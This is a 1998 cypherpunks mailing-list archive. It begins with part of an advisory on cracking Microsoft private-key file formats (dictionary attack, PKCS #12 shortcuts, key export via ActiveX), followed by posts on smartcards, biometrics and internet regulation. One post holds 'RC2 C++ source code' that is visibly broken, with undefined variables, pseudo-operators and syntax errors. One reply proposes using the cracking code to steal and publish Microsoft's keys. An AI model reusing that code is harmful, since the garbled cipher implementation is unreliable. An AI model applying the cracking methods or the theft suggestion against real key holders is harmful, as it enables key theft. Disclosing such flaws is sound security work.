program which, when run on either type of key file, should be able to recover
the users private keys from most files in a matter of seconds.
 
A (somewhat limited) example of this type of program is available in source
code form from http://www.cs.auckland.ac.nz/~pgut001/pubs/breakms.c.  Because
it's meant as a proof-of-concept program it's somewhat crude, and restricted to
recovering passwords which are single dictionary words.  Note: This does not
mean that using (say) two words as a password instead of one will protect your
private key.  All it means is that I haven't bothered to write anything more
sophisticated - no doubt anyone who was serious about this could adapt
something like cracklib's password-generation rules and routines to provide a
more comprehensive and powerful type of attack.  Similarly, by making trivial
changes to the key file data format it's possible to fool the program until
someone makes an equally trivial change to the program to track the format
change - this is meant as a demonstrator only, not a do-everything encryption
breaker.
 
To use the program, compile and invoke it with:
 
  breakms <Microsoft key file> <word list file>
 
Here's what the output should look like (some of the lines have been trimmed a
bit):
 
  File is a PFX/PKCS #12 key file.
  Encrypted data is 1048 bytes long.
  The password which was used to encrypt this Microsoft PFX/PKCS #12 file is
    'orthogonality'.
 
  Modulus = 00BB6FE79432CC6EA2D8F970675A5A87BFBE1AFF0BE63E879F2AFFB93644D [...]
  Public exponent = 010001
  Private exponent = 6F05EAD2F27FFAEC84BEC360C4B928FD5F3A9865D0FCAAD291E2 [...]
  Prime 1 = 00F3929B9435608F8A22C208D86795271D54EBDFB09DDEF539AB083DA912D [...]
  Prime 2 = 00C50016F89DFF2561347ED1186A46E150E28BF2D0F539A1594BBD7FE4674 [...]
  Exponent 1 = 009E7D4326C924AFC1DEA40B45650134966D6F9DFA3A7F9D698CD4ABEA [...]
  Exponent 2 = 00BA84003BB95355AFB7C50DF140C60513D0BA51D637272E355E397779 [...]
  Coefficient = 30B9E4F2AFA5AC679F920FC83F1F2DF1BAF1779CF989447FABC2F5628 [...]
 
Someone sent me a test Microsoft key they had created with MSIE 3.0 and the
program took just a few seconds to recover the password used to encrypt the
file.
 
One excuse offered by Microsoft is that Windows NT has access control lists
(ACL's) for files which can be used to protect against this attacks and the one
described below.  However this isn't notably useful: Most users will be running
Windows '95 which doesn't have ACL's, of the small remainder using NT most
won't bother setting the ACL's, and in any case since the attack is coming from
software running as the current user (who has full access to the file), the
ACL's have no effect.  The ACL issue is merely a red herring, and offers no
further protection.
 
 
Further Attacks (information provided by Steve Henson <shenson@bigfoot.com>)
---------------
 
There is a further attack possible which works because Microsoft's security
products rely on the presence of the Microsoft CryptoAPI, which has a wonderful
function called CryptExportKey().  This function hands over a users private key
to anyone who asks for it.  The key is encrypted under the current user, so any
other program running under the user can obtain their private key with a single
function call.  For example an ActiveX control on a web page could ask for the
current users key, ship it out to a remote site, and then delete itself from
the system leaving no trace of what happened, a bit like the mail.exe program I
wrote about 2 years ago which did the same thing for Windows passwords.  If the
control is signed, there's no way to stop it from running even with the highest
security level selected in MSIE, and since it immediately erases all traces of
its existence the code signing is worthless.
 
Newer versions of the CryptoAPI which come with MSIE 4 allow the user to set a
flag (CRYPT_USER_PROTECTED) which specifies that the key export function should
be protected with no protection (the default), user notification, or password
protection.  However the way this is implemented makes it pretty much useless.
Firstly, if the certificate request script used to generate the key doesn't set
this flag, you end up with the default of "no protection" (and the majority of
users will just use the default of "no protection" anyway).  Although Microsoft
claim that "reputable CA's won't forget to set this flag", a number of CA's
tested (including Verisign) don't bother to set it (does this mean that
Microsoft regard Verisign as a disreputable CA? :-).  Because of this, they
don't even provide the user with the option of selecting something other than
"no security whatsoever".
 
In addition at least one version of CryptoAPI would allow the "user
notification" level of security to be bypassed by deleting the notification
dialog resource from memory so that the call would quietly fail and the key
would be exported anyway (this is fairly tricky to do and involves playing with
the CPU's page protection mechanism, there are easier ways to get the key than
this).
 
Finally, the "password protection" level of security asks for the password a
whopping 16 (yes, *sixteen*) times when exporting the key, even though it only
needs to do this once.  After about the fifth time the user will probably click
on the "remember password" box, moving them back to zero security until they
reboot the machine and clear the setting, since the key will be exported with
no notification or password check once the box is clicked.
 
To check which level of security you have, try exporting your key certificate.
If there's no warning/password dialog, you have zero security for your key, and
don't even need to use the encryption-breaking technique I describe elsewhere
in this article.  Any web page you browse could be stealing your key (through
an embedded ActiveX control) without you ever being aware of it.
 
 
Details on Breaking the Older Format
------------------------------------
 
The Microsoft key format is very susceptible to both a dictionary attack and to
keystream recovery.  It uses the PKCS #8 format for private keys, which
provides a large amount of known plaintext at the start of the data, in
combination with RC4 without any form of IV or other preprocessing (even though
PKCS #8 recommends that PKCS #5 password-based encryption be used), which means
you can recover the first 100-odd bytes of key stream with a simple XOR (the
same mistake they made with their .PWL files, which was publicised 2 1/2 years
earlier).  Although the password is hashed with MD5 (allowing them to claim the
use of a 128-bit key), the way the key is applied provides almost no security.
This means two things:
 
1. It's very simple to write a program to perform a dictionary attack on the
   server key (it originally took me about half an hour using cryptlib,
   http://www.cs.auckland.ac.nz/~pgut001/cryptlib/, another half hour to rip
   the appropriate code out of cryptlib to create a standalone program, and a
   few minutes to retarget the program from Netscape to Microsoft).
 
2. The recovered key stream from the encrypted server key can be used to
   decrypt any other resource encrypted with the server password, *without
   knowing the password*.  This is because there's enough known plaintext
   (ASN.1 objects, object identifiers, and public key components) at the start
   of the encrypted data to recover large quantities of key stream.  This means
   that even if you use a million-bit encryption key, an attacker can still
   recover at least the first 100 bytes of anything you encrypt without needing
   to know your key (Frank Stevenson's glide.exe program uses this to recover
   passwords from Windows .PWL files in a fraction of a second).
 
The problem here is caused by a combination of the PKCS #8 format (which is
rather nonoptimal for protecting private keys) and the use of RC4 to encryt
fixed, known plaintext.  Since everything is constant, you don't even need to
run the password-transformation process more than once - just store a
dictionary of the resulting key stream for each password in a database, and
you can break the encryption with a single lookup (this would be avoided by
the use of PKCS #5 password-based encryption, which iterates the key setup and
uses a salt to make a precomputed dictionary attack impossible.  PKCS #5
states that its primary intended application is for protecting private keys,
but Microsoft (and Netscape) chose not to use this and went with straight RC4
encryption instead).  This is exactly the same problem which came up with
Microsoft's .PWL file encryption in 1995, and yet in the 2 1/2 years since I
exposed this problem they still haven't learnt from their previous mistakes.
 
For the curious (and ASN.1-aware), here's what the data formats look like.
First there's the outer encapsulation which Microsoft use to wrap up the
encrypted key:
 
  MicrosoftKey ::= SEQUENCE {
    identifier          OCTET STRING ('private-key'),
    encryptedPrivateKeyInfo
                        EncryptedPrivateKeyInfo
    }
 
Inside this is a PKCS #8 private key:
 
  EncryptedPrivateKeyInfo ::= SEQUENCE {
    encryptionAlgorithm EncryptionAlgorithmIdentifier,
    encryptedData       EncryptedData
    }
 
  EncryptionAlgorithmIdentifier ::= AlgorithmIdentifier
 
  EncryptedData = OCTET STRING
 
Now the EncryptionAlgorithmIdentifier is supposed to be something like
pbeWithMD5AndDES, with an associated 64-bit salt and iteration count, but
Microsoft (and Netscape) ignored this and used straight rc4 with no salt or
iteration count.  The EncryptedData decrypts to:
 
  PrivateKeyInfo ::= SEQUENCE {
    version             Version
    privateKeyAlgorithm PrivateKeyAlgorithmIdentifier
    privateKey          PrivateKey
    attributes    [ 0 ] IMPLICIT Attributes OPTIONAL
    }
 
  Version ::= INTEGER
 
  PrivateKeyAlgorithmIdentifier ::= AlgorithmIdentifier
 
  PrivateKey ::= OCTET STRING
 
  Attributes ::= SET OF Attribute
 
(and so on and so on, I haven't bothered going down any further).  One thing
worth noting is that Microsoft encode the AlgorithmIdentifier incorrectly by
omitting the parameters, these should be encoded as a NULL value if there are
no parameters. In this they differ from Netscape, indicating that both
companies managed to independently come up with the same broken key storage
format.  Wow.
 
For people picking apart the inner key, Microsoft also encode their ASN.1
INTEGERs incorrectly, so you need to be aware of this when reading out the
data.
 
 
Details on Breaking the PFX/PKCS #12 Format
-------------------------------------------
 
The PFX/PKCS #12 format is vastly more complex (and braindamaged) than the
older format.  You can find an overview of some of the bletcherousness in this
format at http://www.cs.auckland.ac.nz/~pgut001/pfx.html.  After Microsoft
originally designed the format (calling it PFX) and presented it to the world
as a fait accompli, cleanup crews from other companies rushed in and fixed some
of the worst problems and security flaws.  However by this time Microsoft had
already shipped implementations which were based on the earlier version with
all its flaws and holes, and didn't want to change their code any more.  A
side-effect of this was that to be compatible, other vendors had to copy
Microsofts bugs rather than produce an implementation in accordance with the
standard.  Newer versions of the standard have now been amended to define the
implementation bugs as a part of the standard.
 
Anyway, as a result of this it's possible to mount three independant types of
attack on Microsoft's PFX/PKCS #12 keys:
 
1. Attack the RC2/40 encryption used in all versions, even the US-only one.
2. Attack the MAC used to protect the entire file.  Since the same password is
   used for the MAC and the encrypted key, recovering the MAC password also
   recovers the password used to encrypt the private key.  The cleanup crews
   added a MAC iteration count to make this attack harder, but Microsoft
   ignored it.
3. Attack the private key encryption key directly.  Like the MAC's, this also
   has an interation count.  Microsoft don't use it.
 
Even if one of these flaws is fixed, an attacker can simply switch over and
concentrate on a different flaw.
 
I decided to see which one could be implemented the most efficiently.
Obviously (1) was out (you need to perform 2^39 RC2 key schedules on average
to find the key), which left (2) and (3).  With the refinements I'm about to
describe, it turns out that an attack on the private key encryption is
significantly more efficient than an attack on the MAC.
 
To understand how the attack works, you need to look at how PKCS #12 does its
key processing.  The original PFX spec included only some very vague thoughts
on how to do this.  In later PKCS #12 versions this evolved into a somewhat
garbled offshoot of the PKCS #5 and TLS key processing methods.  To decrypt
data which is "protected" using the PKCS #12 key processing, you need to do the
following:
 
  construct a 64-byte "diversifier" (which differs depending on whether you
        want to set up a key or an IV) and hash it;
  stretch the salt out to 64 bytes and hash it after the diversifier hash;
  stretch the password out to 64 bytes (using incorrect processing of the
        text string, this is one of Microsofts implementation bugs which has
        now become enshrined in the standard) and hash it after the salt hash;
  complete the hash and return the resulting value as either the key or the
        IV, depending on the diversifier setting;
 
(it's actually rather more complex than that, this is a stripped-down version
which is equivalent to what Microsoft use).
 
This process is carried out twice, once for the key and once for the IV.  The
hashing is performed using SHA-1, and each of the two invocations of the
process require 4 passes through the SHA-1 compression function, for a total
of 8 passes through the function.  Because the PKCS #12 spec conveniently
requires that all data be stretched out to 64 bytes, which happens to be the
data block size for SHA-1, there's no need for the input processing which is
usually required for SHA-1 so we can strip this code out and feed the data
directly into the compression function.  Thus the compression function (along
with the RC2 key setup) is the limiting factor for the speed of an attack.
Obviously we want to reduce the effort required as much as possible.
 
As it turns out, we can eliminate 6 of the 8 passes, cutting our workload by
75%.  First, we observe that the the diversifier is a constant value, so
instead of setting it up and hashing it, we precompute the hash and store the
hash value.  This eliminates the diversifier, and one pass through SHA-1.
 
Next, we observe that the salt never changes for the file being attacked, so
again instead of setting it up and hashing it, we precompute the hash and
store the hash value.  This eliminates the diversifier, and another pass
through SHA-1.
 
Finally, all that's left is the password.  This requires two passes through
the compression function, one for the password (again conveniently stretched
to 64 bytes) and a second one to wrap up the hashing.
 
In theory we'd need to repeat this process twice, once to generate the
decryption key and a second time to generate the decryption IV which is used
to encrypt the data in CBC mode.  However the start of the decrypted plaintext
is:
 
  SEQUENCE {
    SEQUENCE {
      OBJECT IDENTIFIER,
          ...
 
and the SEQUENCE is encoded as 30 82 xx xx (where xx xx are the length
bytes).  This means the first 8 bytes will be 30 82 xx xx 30 82 xx xx, and
will be followed by the object identifier.  We can therefore skip the first 8
bytes and, using them as the IV, decrypt the second 8 bytes and check for the
object identifier.  This eliminates the second PKCS #12 key initialisation
call which is normally required to generate the IV.
 
As this analysis (and the program) shows, Microsoft managed to design a
"security" format in which you can eliminate 75% of the encryption processing
work while still allowing an attack on the encrypted data.  To make it even
easier for an attacker, they then dumbed the key down to only 40 bits, even in
the US-only version of the software.  In fact this doesn't really have any
effect on security, even if they used 128-bit RC2 or triple DES or whatever,
it would provide no extra security thanks to the broken key processing.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Wed, 21 Jan 1998 18:26:21 +0800
To: cypherpunks@toad.com
Subject: Re:  Latest smartcard software
Message-ID: <199801211005.FAA12259@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From cypherpunks-errors@toad.com Wed Jan 21 03:38:35 1998
   >   
   >   The Independent Smartcard Developer Association, the only non-vendor
   >   controlled smartcard related industry organization, announces their latest
   >   release of SIO/STEST.
   >   
   >   SIO/STEST is a developer toolkit that provides drivers for most popular
   >   smartcard readers as well as card support for a wide range of crypto
   >   capable smartcards. SIO/STEST provides the tools required by the
   >   application programmer to integrate smartcards with their application.
   >   
   >   As always, your feedback is appreciated.

Is this for a "cypherpunks" smartcard, or for hacking them?

Smartcards tend to be transponders, and to want to gobble up
all other cards...bad card, bad card.

Excerpt from the Cryptography Manifesto enclosed.
---guy



Consider it an NSA proposal to issue everyone a Universal Biometrics Card.
 
Everyone in the world.
 
#   By John Walker -- kelvin@fourmilab.ch, Revision 8 -- February 28th, 1994
#
#   Operationally, the Universal Biometrics Card serves as the cardholder's
#   identification   for   all   forms   of   transactions    and
#   interactions.    It  can  potentially  replace  all  the
#   following forms of identification and credentials:
#
#           Passport and visas
#           House and car keys
#           Driver's license and automobile registration(s)
#           Employee ID card
#           Bank credit, debit, and automatic teller cards
#           Health insurance card
#           Medical history/blood type/organ donor cards
#           Automobile insurance card
#           Telephone credit card(s)
#           Membership card for clubs, museums, etc.
#           Frequent flyer club card(s) and flight coupons
#           Car rental discount card(s)
#           Train, bus, airplane, toll road and bridge tickets
#           Airline flight boarding pass
#           Train and bus pass and subscription card
#           WHO immunisation certificate
#           Personal telephone directory
#           Personal telephone number
#           Passwords for access to computers, data services, and networks
#           Software subscription access keys
#           Cable and satellite TV subscriptions
#           Cellular phone and personal digital assistant personal ID
#           Encryption keys for secure electronic mail, phone, and FAX
#           Electronic signature key
#
#           Cash
#
#   Of course, use of the Universal Biometrics
#   Card will start out as voluntary...
 
They'll say hey, you've already surrendered your biometric number
during fingerprinting for driver's licenses.
 
It will be too late.
 
The high-tech American Leviathan will be in place.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: phelix@vallnet.com
Date: Wed, 21 Jan 1998 15:42:03 +0800
To: cypherpunks@Algebra.COM
Subject: Re: [Long] How to recover private keys for various Microsoft products
In-Reply-To: <88531016604880@cs26.cs.auckland.ac.nz>
Message-ID: <34c5a027.243529486@128.2.84.191>
MIME-Version: 1.0
Content-Type: text/plain



On 20 Jan 1998 23:19:36 -0600, pgut001@cs.auckland.ac.nz (Peter Gutmann)
wrote:

>    How to recover private keys for Microsoft Internet Explorer, Internet
>            Information Server, Outlook Express, and many others
>                                      - or -
>                 Where do your encryption keys want to go today?
> 
>                    Peter Gutmann, <pgut001@cs.auckland.ac.nz>
> 
As if there wasn't enough incentive to steal private keys, here's a little
diddy from news.com (Where do your stocks want to go today?):

MS pushes NT for
                securities 
                By Tim Clark
                January 20, 1998, 5:25 p.m. PT 

                update Pushing into Sun Microsystems' (SUNW)
                territory, Microsoft (MSFT) said today it will expand
                its Windows DNA for Financial Services framework
                (DNA-FS) beyond banking and into the securities
                industry. 

                Microsoft's goal: to sell its Windows NT Server
                software as a platform to automate all the
                paperwork involved in buying and selling securities, a
                market which Sun has dominated. The company also
                hopes to gain from the consolidation trend among
                banks, stock brokerages, and insurance companies. 

                "Sun is the competitor in this market," Microsoft's
                Matt Conners, worldwide securities industry
                manager, said. 

                In a related announcement, Tibco, owned by
                Reuters, will port its financial messaging middleware
                to the Windows NT Server platform.
                Hewlett-Packard will support deployments of Tibco's
                system with the consulting and PC servers. 

                The announcements, part of Microsoft's effort to
                move its technologies into vertical industries that
                Unix has dominated, came in Bill Gates's address by
                satellite today at a financial services conference in
                London. DNA stands for Distributed interNet
                Applications for Financial Services (DNA-FS), a
                software framework that allows software
                components to connect to mainframes, WebTV
                systems, and other computers. 

                Gates also today reiterated Microsoft's plans to ship
                a second beta test version of its Windows NT 5.0
                operating system by mid-year, followed by the final
                version within six to nine months afterwards. 

                "We're doing very well on the desktop--we've
                replaced a lot of Unix workstations," Conners said,
                estimating that in the retail brokerage segment, more
                than a quarter of desktops run NT Server. Those
                figures are boosted by Merrill Lynch and Smith
                Barney using NT in their retail operations. "It's
                probably less on trading floors." 

                Far less, says Rob Hall, vice president in Sun's unit
                that sells to the securities industry. 

                "The trading floor is still predominantly Sun, and we
                see our Darwin entry-level workstation, and
                especially our thin client technology and products
                offering us a chance to grow that market share," said
                Hall. 

                Sun's competing architecture for securities firms is
                called Sun Connect, which was demonstrated last
                June at the Security Industries Association trade
                show. Microsoft hopes to demonstrate its DNA-FS
                architecture at this year's SIA show. 

                Hall said Sun Connect embraces Java-based
                network computers (NCs), not just Windows desktop
                machines. Wall Street has strongly endorsed Java,
                according to recent surveys, and Hall called
                Microsoft's failure to address Java in DNA-FS "a
                glaring omission." 

                Like Microsoft's DNA-FS, Sun Connect also targets
                the convergence in financial services--banks,
                insurers, and brokerages getting into one another's
                businesses, often through mergers or acquisitions. 

                Microsoft's immediate goal is to create NT-based
                solutions to the so-called Straight-Through
                Processing (STP) problem. Stock trades must wend
                through multiple computer systems at different
                companies, a system that is not fully automated.
                Microsoft hopes its partners, such as Tibco, will build
                NT software to streamline transactions by passing
                digital information from one computer system to
                another and by minimizing paperwork. 

                The underlying technology in Microsoft's effort is
                Component Object Management or COM, which
                puts information into digital wrappers that can be
                passed from computer to computer, including
                mainframes and Unix machines. 

                Sun's Hall faulted Microsoft's initiative for relying on
                its COM architecture, used in Windows but not
                endorsed by an industry standards group such as
                Open Group, which backs CORBA for similar
                purposes. 

                Today's announcement expands DNA-FS, which
                was announced last month for banking, to the
                broader securities market. A similar effort in the
                insurance industry, called OLifE, also will be grouped
                under the broader DNA-FS framework. 

                "The goal of DNA FS is not to facilitate
                convergence of industries at all; but it's clear those
                industries will converge," Conners said. "DNA FS
                will be a technical solution for when those industries
                converge to be able to plug in software." 

                Tibco's involvement is key because it has 400
                customers and about half the market for trading floor
                software. The port to NT Server will take less than a
                year, Conners said. 

                Several software vendors backing Windows
                DNA-FS for securities include Advent Software,
                Comprehensive Software Systems, Dow Jones
                Markets, and Financial Technology International. 

                Microsoft and partners hope to reduce the costs of
                processing transactions by building on established
                standards in the financial services industry. 

                Reuters contributed to this report





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 21 Jan 1998 16:20:11 +0800
To: cypherpunks@toad.com
Subject: RC2 C++ source code
Message-ID: <199801210756.IAA06610@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain




RC2 VC++ source code

#include <string.h>
#include <assert.h>

void RC2Keyschedule::schedule
( unsigned short K[64], const unsigned char L[128], unsigned T8, unsigned TM )
	{
	unsigned char x;
	unsigned i;

	/* 256-entry permutation table, probably derived somehow from pi */

	static const unsigned char PITABLE[256] = {
	    217,120,249,196, 25,221,181,237, 40,233,253,121, 74,160,216,157,
	    198,126, 55,131, 43,118, 83,142, 98, 76,100,136, 68,139,251,162,
	     23,154, 89,245,135,179, 79, 19, 97, 69,109,141,  9,129,125, 50,
	    189,143, 64,235,134,183,123, 11,240,149, 33, 34, 92,107, 78,130,
	     84,214,101,147,206, 96,178, 28,115, 86,192, 20,167,140,241,220,
	     18,117,202, 31, 59,190,228,209, 66, 61,212, 48,163, 60,182, 38,
	    111,191, 14,218, 70,105,  7, 87, 39,242, 29,155,188,148, 67,  3,
	    248, 17,199,246,144,239, 62,231,  6,195,213, 47,200,102, 30,215,
	      8,232,234,222,128, 82,238,247,132,170,114,172, 53, 77,106, 42,
	    150, 26,210,113, 90, 21, 73,116, 75,159,208, 94,  4, 24,164,236,
	    194,224, 65,110, 15, 81,203,204, 36,145,175, 80,161,244,112, 57,
	    153,124, 58,133, 35,184,180,122,252,  2, 54, 91, 37, 85,151, 49,
	     45, 93,250,152,227,138,146,174,  5,223, 41, 16,103,108,186,201,
	    211,  0,230,207,225,158,168, 44, 99, 22,  1, 63, 88,226,137,169,
	     13, 56, 52, 27,171, 51,255,176,187, 72, 12, 95,185,177,205, 46,
	    197,243,219, 71,229,165,156,119, 10,166, 32,104,254,127,193,173
	};

	assert(len > 0 && len <= 128);
	assert(bits <= 1024);
	if (!bits)
		bits = 1024;

	memcpy(xkey, key, len);
	
	for (i = 0; i < 128; i++) {
                L[i] = PITABLE[L[i-1] + L[i-T]];
	}
	
        T8 = (T1+7) >> 3;
        TM = 255 MOD 2^(8 + T1 - 8*T8);

        L[128-T8] = PITABLE[L[128-T8] & TM];

	for (i = 0; i < 127-T8; i++) {
                L[i] = PITABLE[L[i+1] XOR L[i+T8]];
	};

	i = 63;
	
        K[i] = L[2*i] + 256*L[2*i+1];
	};

void RC2Encryption::ProcessBlock
( const unsigned short K[64], )
	{
	unsigned R3, R2, R1, R0, i;

	for (i = 0; i < 16; i++) {
		R0 += (R1 & ~R3) + (R2 & R3) + K[4*i-0];
		R0 = R0 << 1;
		
		R1 += (R2 & ~R0) + (R3 & R0) + K[4*i-1];
		R1 = R1 << 2;

		R2 += (R3 & ~R1) + (R0 & R1) + K[4*i-2];
		R2 = R2 << 3;

		R3 += (R0 & ~R2) + (R1 & R2) + K[4*i-3];
		R3 = R3 << 5;

		if (i == 4 || i == 10) {
			R0 += K[R3 & 63];
			R1 += K[R0 & 63];
			R2 += K[R1 & 63];
			R3 += K[R2 & 63];
		}
	}

void RC2Decryption::ProcessBlock
( const unsigned short K[64], )
	{
	unsigned R3, R2, R1, R0, i;

	for (i = 0; i < 16; i++) {
		R3 = R3 << 5;
		R3 += (R0 & ~R2) + (R1 & R2) + K[4*i+3];

		R2 = R2 << 3;
		R2 += (R3 & ~R1) + (R0 & R1) + K[4*i+2];

		R1 = R1 << 2;
		R1 += (R2 & ~R0) + (R3 & R0) + K[4*i+1];

		R0 = R0 << 1;
		R0 += (R1 & ~R3) + (R2 & R3) + K[4*i+0];

		if (i == 4 || i == 10) {
			R3 -= K[R2 & 63];
			R2 -= KR1 & 63];
			R1 -= K[R0 & 63];
			R0 -= K[R3 & 63];
		}
	}









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Wed, 21 Jan 1998 16:37:00 +0800
To: cryptography@c2.net
Subject: Latest smartcard software
Message-ID: <Pine.BSF.3.96.980121090526.12146A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



The Independent Smartcard Developer Association, the only non-vendor
controlled smartcard related industry organization, announces their latest
release of SIO/STEST.

SIO/STEST is a developer toolkit that provides drivers for most popular
smartcard readers as well as card support for a wide range of crypto
capable smartcards. SIO/STEST provides the tools required by the
application programmer to integrate smartcards with their application.

Current release:	1.11e (January 20, 1998)
Changes:	- added support for GSM SIM's
		- additional Chipknip support
		- Schlumberger reader support

As alwasy, your feedback is appreciated.

Thanks,
-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ? the Platypus {aka David Formosa} <dformosa@st.nepean.uws.edu.au>
Date: Wed, 21 Jan 1998 15:40:00 +0800
To: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>
Subject: Re: Locating radio receivers
In-Reply-To: <E0xtbs7-0004Rk-00@heaton.cl.cam.ac.uk>
Message-ID: <Pine.LNX.3.93.980121162610.139E-100000@shirley>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 17 Jan 1998, Markus Kuhn wrote:

> Kay Ping wrote on 1998-01-16 22:02 UTC:
> > Radio links are perfect for hiding the location of receivers.

[...]

> As Peter Wright reported in his autobiography, British counterintelligence
> (MI5) used vans and planes

IIRC the BBC uses such vans to detect unlicened recivers in Brition.
(However I have also heard that such vans are more effective at spreading
FUD).

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBNMWHZKQK0ynCmdStAQFukQQAqRsMoLTPkunuFQWoyzvG7vLtRNEh0Xgf
L/V/J9/O6PeCKXZhURMdR9FHQvsZ7ETS677LsuAdapoS+swwtRxWhwHBXdJkDa3M
Oyz23S4Q3QR5WtvfRz7gj843yjpig7Hm/mwVUMTmUXC+lp6TXmKJAH/vFHyOkxPl
CgFsMHGFUN0=
=DeXr
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 22 Jan 1998 05:11:49 +0800
To: Lucky Green <shamrock@cypherpunks.to>
Subject: Re: British Ministers Adopt Unbreakable Crypto
In-Reply-To: <Pine.BSF.3.96.980120043931.10472B-100000@pakastelohi.cypherpunks.to>
Message-ID: <3.0.5.32.19980120112722.00864320@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:18 PM 1/19/98 -0800, Tim May wrote:
>At 7:53 PM -0800 1/19/98, Lucky Green wrote:
>>I asked the exhibitor if the scanner would grant access to a hand not
>>attached to the body. At first, the exhibitor paled and replied that if a
...
>Well, the droids they hire to man their booths are Happy People.

Sometime in the late 80s I was at some computer security conference
that had some presentations on biometrics; the issue of body parts
no longer attached to original-condition bodies was brought up by
several of the exhibitors (I think they were checking for pulse
while scanning fingerprints, for example.)  As Tim said, the 
James Bond movie was old by then, and also the military and other
Feds have been early enthusiasts for biometric identifiers - if the
KGB is bothered by detached hands, it's because it takes longer
than just carrying the guard's body across the room, and the
bloodstains might be noticed faster than a "sleeping" guard.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Thu, 22 Jan 1998 05:44:57 +0800
To: cryptography@c2.net
Subject: Re: [Long] How to recover private keys for various Microsoftproducts
In-Reply-To: <88531016604880@cs26.cs.auckland.ac.nz>
Message-ID: <v03102800b0eab79afcbc@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:29 AM +0000 1/21/98, Peter Gutmann wrote:
>    How to recover private keys for Microsoft Internet Explorer, Internet
>            Information Server, Outlook Express, and many others
>                                      - or -
>                 Where do your encryption keys want to go today?
> 
>                    Peter Gutmann, <pgut001@cs.auckland.ac.nz>
> 
>Summary
>-------
> 
>Microsoft uses two different file formats to protect users private keys, the
>original (unnamed) format which was used in older versions of MSIE, IIS, and
>other software and which is still supported for backwards-compatibility reasons
>in newer versions, and the newer PFX/PKCS #12 format.  Due to a number of
>design and implementation flaws in Microsofts software, it is possible to break
>the security of both of these formats and recover users private keys, often in
>a matter of seconds.  In addition, a major security hole in Microsofts
>CryptoAPI means that many keys can be recovered without even needing to break
>the encryption.  These attacks do not rely for their success on the presence of
>weak, US-exportable encryption, they also affect US versions.
> 
>As a result of these flaws, no Microsoft internet product is capable of
>protecting a users keys from hostile attack.  By combining the attacks
>described below with widely-publicised bugs in MSIE which allow hostile sites
>to read the contents of users hard drives or with an ActiveX control, a victim
>can have their private key sucked off their machine and the encryption which
>"protects" it broken at a remote site without their knowledge.
> 


Seems a good way to teach M$ a security lesson is to use Peter's code to snatch M$' ant significant keys on their corporate servers and publish.  Of course, they're probably too smart to leave important data just lying around on unsecure '95/NT servers and instead use Linux ;-)

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@vorlon.mit.edu>
Date: Thu, 22 Jan 1998 03:59:53 +0800
To: cypherpunks@cyberpass.net
Subject: Gore Commission wants to regulate the Net like broadcast
Message-ID: <Pine.LNX.3.95.980120163439.4246A-100000@vorlon.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Tue, 20 Jan 1998 13:28:24 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: FC: Gore Commission wants to regulate the Net like broadcast

*************

Date: Tue, 20 Jan 1998 16:20:23 -0500
From: Alan Moseley <amoseley@clark.net>
To: declan@well.com
Subject: the Gore Commission and digital media

The Gore Commission -- the group created by Clinton to determine the 
future public interest obligations of digital TV broadcasters -- showed 
signs last week of broadening its reach to include other digital media 
that can deliver broadcast-like audio and video.

Significantly, the group discussed the possibility of including other 
digital media in their recommendations after viewing a demonstration of 
the Internet's potential to provide audio and video.

If digital TV broadcasters can be made to serve some notion of the "public 
interest" through government-mandated programming and restrictions on 
programming, is it not a short step for the government to regulate other 
digital content-providers?

This group should be watched carefully as they discuss future regulations 
on digital speech.

The Media Institute (http://www.mediainst.org), a First Amendment advocacy 
group based in Washington, has issued the following press release on this 
subject:

---------------------

Media Institute's Public Interest Council Sees Danger
in Gore Commission Suggestion

	Washington, Jan. 20 -- The prospect of extending 
government-mandated public interest obligations beyond the broadcasting 
industry, raised in comments by the co-chairman of the Gore Commission, 
illustrates both the lack of justification for and danger in these 
proceedings, The Media Institute's Public Interest Council said today.
	The Council was reacting to comments last Friday by Norman 
Ornstein, co-chairman of the Advisory Committee on Public Interest 
Obligations of Digital Television Broadcasters, at an open meeting of the 
group in Washington.
	Following a demonstration of "video streaming" Internet technology 
and a discussion of digital convergence, Ornstein noted that mandatory 
public interest obligations on broadcasters may not be sufficient. He 
suggested that the Advisory Committee (popularly known as the Gore 
Commission) might want to examine the public interest role of other 
digital media as well.
	Ornstein questioned "whether we should be making this really firm 
distinction, saddling broadcasters...with heavy public interest 
obligations, and letting others get off scot-free."
	Media Institute President Patrick D. Maines, speaking for the 
Institute's Public Interest Council, challenged that idea: "The mere 
mention of that possibility -- extending the 'public interest' rationale 
to other media -- should raise alarms for anyone who values our country's 
constitutional guarantees of free speech and free press.
